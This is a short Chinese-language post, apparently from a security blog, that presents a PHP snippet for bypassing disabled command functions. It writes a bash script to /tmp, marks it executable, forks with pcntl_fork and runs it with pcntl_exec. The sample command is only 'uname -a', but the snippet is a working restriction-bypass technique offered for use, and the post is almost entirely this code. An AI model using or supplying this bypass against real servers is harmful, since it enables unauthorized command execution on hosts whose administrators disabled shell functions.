pcntl_exec函数绕过-命令执行

好大一条虫 416 次浏览 0
## bypass pcntl_exec

类似windows下的shell.application

<?php
header("Content-Type: text/plain");
$cmd="/tmp/exec";
@unlink($cmd);
@unlink("/tmp/output");
$c = "#!/usr/bin/env bash\nuname -a > /tmp/output\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);

switch (pcntl_fork()) {
case 0:
$ret = pcntl_exec($cmd);
exit("case 0");
default:
echo "case 1";
break;
}

发表评论 取消回复
表情 图片 链接 代码